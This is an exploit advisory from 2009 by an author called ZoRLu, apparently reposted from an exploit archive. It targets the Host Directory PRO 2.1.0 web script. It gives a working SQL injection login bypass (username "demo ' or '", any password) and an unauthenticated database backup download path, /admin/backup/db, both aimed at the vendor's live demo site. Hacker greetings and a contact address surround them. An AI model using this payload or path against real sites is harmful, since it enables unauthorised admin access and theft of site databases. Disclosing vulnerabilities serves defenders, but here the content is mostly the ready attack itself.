[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Host Directory PRO 2.1.0 Remote Database Backup Vulnerability
# Published : 2009-06-04
# Author : ZoRLu
# Previous Title : AdPeeps 8.5d1 XSS and HTML Injection Vulnerabilities
# Next Title : Web Directory PRO Remote Database Backup Vulnerability


[~] Host Directory Pro Bypass & Backup DB Disc. Multiple Vulns.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  msn: trt-turk@hotmail.com
[~]
[~] Date: 28/03/09
[~]
[~] Home: yildirimordulari.com / z0rlu.blogspot.com / www.experl.com / woltaj.org
[~]
[~] N0T: Herkes Hecker Olmus :S
[~]
[~] N0T: New Target Buffer Overflow : ) there is a little time xD
[~]
[~] N0T: Unutulduk mu ?
[~] -----------------------------------------------------------

script:

http://www.phphostdirectoryscript.com/

Bypass for demo:

username: demo ' or '

pass: ZoRLu or dont write anything

http://demo-host-directory-pro.phphostdirectoryscript.com/

Backup DB Disc. for demo:

http://demo-host-directory-pro.phphostdirectoryscript.com/admin/backup/db

[~]----------------------------------------------------------------------
[~] Greetz tO: Cyber-Zone & Dr.Ly0N & w0cker
[~]
[~] yildirimordulari.com / z0rlu.blogspot.com / www.experl.com / woltaj.org
[~]
[~]----------------------------------------------------------------------

# www.Syue.com [2009-06-04]